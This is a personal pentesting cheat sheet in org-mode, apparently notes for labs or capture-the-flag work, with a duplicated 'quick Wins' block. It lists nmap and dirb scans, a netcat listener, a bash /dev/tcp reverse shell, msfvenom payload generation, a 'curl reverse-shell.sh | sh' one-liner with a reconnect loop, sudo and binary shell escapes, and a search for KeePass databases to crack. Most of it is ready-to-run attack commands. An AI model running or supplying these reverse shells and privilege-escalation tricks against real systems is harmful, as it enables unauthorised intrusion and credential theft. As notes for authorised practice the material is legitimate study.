Rh17S15/pentesting
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
pentesting/Cheatsheet.org
Rh17S15 ad56aad266 links
2025-07-28 09:30:28 +02:00

246 lines
4.6 KiB
Org Mode
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
**** to install:
- magic wormhole
- tldr
- rlwrap
-
#+BEGIN_SRC bash
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
#+END_SRC
**** for keyring
-> if there is some kind of keyring error
#+BEGIN_SRC bash
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
#+END_SRC
* information gathering
*** nmap
for quick scan of available ips
#+BEGIN_SRC bash
nmap -sn ip/24
#+END_SRC
to filter output for open ips
#+BEGIN_SRC bash
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
#+END_SRC
scan open ports:
#+BEGIN_SRC bash
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
#+END_SRC
*** dirb
#+BEGIN_SRC bash
dirb http://ip
#+END_SRC
**** bei windows
#+BEGIN_SRC bash
nmap --vuln ip
#+END_SRC
***** bei windows \+ smb
#+BEGIN_SRC bash
nmap --script smb-vuln* ip
#+END_SRC
* inital access
*** start listener:
#+BEGIN_SRC bash
rlwrap -cAr nc -nlvp 9002
#+END_SRC
*** reverse shell bash:
#+BEGIN_SRC bash
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
#+END_SRC
*** reverse shell file:
#+BEGIN_SRC bash
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
#+END_SRC
-> from revshells.com
*** untested:
Reverse Shell as a Service
1. On your machine:
#+BEGIN_SRC bash
nc -l 1337
or nlvp?
#+END_SRC
2. On the target machine:
#+BEGIN_SRC bash
curl https://reverse-shell.sh/yourip:1337 | sh
#+END_SRC
**** reconnecting:
#+BEGIN_SRC bash
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
#+END_SRC
* privilege escalation
** always run these:
#+BEGIN_SRC bash
sudo -l
#+END_SRC
if sudo doesn't work:
[[*TTY Spawn Shell]]
**** check cronjobs
#+BEGIN_SRC bash
ls /etc/cron.*
crontab -l
#+END_SRC
** TTY Spawn Shell
***** if sudo still doesn't work
use
#+BEGIN_SRC bash
sudo -S command
#+END_SRC
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
*** Python spawn shell
#+BEGIN_SRC bash
python -c 'import pty; pty.spawn("/bin/bash")'
#+END_SRC
Fully Interactive TTY
**** All the steps to stabilize your shell
**The first step:**
#+BEGIN_SRC bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
#+END_SRC
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still wont be able to use tab autocomplete or the arrow keys.
**Step two is:**
#+BEGIN_SRC bash
export TERM=xterm
#+END_SRC
This will give us access to term commands such as clear.
**Finally (and most importantly) we will background the shell using**
#+BEGIN_SRC bash
Ctrl + Z
#+END_SRC
Back in our own terminal we use
#+BEGIN_SRC bash
stty raw -echo; fg
#+END_SRC
This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
#+BEGIN_SRC bash
stty rows 38 columns 116
#+END_SRC
*** OS system spawn shell
#+BEGIN_SRC bash
echo os.system("/bin/bash")
#+END_SRC
*** Bash spawn shell
#+BEGIN_SRC bash
/bin/sh -i
#+END_SRC
*** Perl spawn shell
#+BEGIN_SRC bash
perl —e 'exec "/bin/sh";'
#+END_SRC
*** Ruby spawn shell
ruby: exec "/bin/sh"
*** Lua spawn shell
lua: os.execute("/bin/sh")
*** IRB spawn shell
exec "/bin/sh"
*** VI spawn shell
#+BEGIN_SRC bash
:!bash
#+END_SRC
*** VI(2) spawn shell
#+BEGIN_SRC bash
:set shell=/bin/bash:shell
#+END_SRC
*** Nmap spawn shell
#+BEGIN_SRC bash
!sh
#+END_SRC
**** Exiftools
Metadaten auslesen:
#+BEGIN_SRC bash
exiftool picture.png
#+END_SRC
Binwalk (Binary Daten exportieren):
#+BEGIN_SRC bash
binwalk -e picture.png
#+END_SRC
* Windows
*** WinPEAS
https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
*** LOLBAS
https://lolbas-project.github.io/#
*** WADCOMS
https://wadcoms.github.io/
*** PrivescCheck Script as an alternative to WinPEAS
https://github.com/itm4n/PrivescCheck
*** RUN these while the other scripts are working
#+BEGIN_SRC powershell
whoami /priv
whoami /all
schtasks /query
#+END_SRC
*** for finding kbdx Files
https://github.com/ivanmrsulja/keepass2john
#+BEGIN_SRC powershell
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
#+END_SRC
quick Wins Linux:
gdb -nx -ex '!sh' -ex quit
sudo mysql -e '! /bin/sh'
strace -o /dev/null /bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'
evilwinrm
quick Wins Linux:
gdb -nx -ex '!sh' -ex quit
sudo mysql -e '! /bin/sh'
strace -o /dev/null /bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'
Reference in New Issue View Git Blame Copy Permalink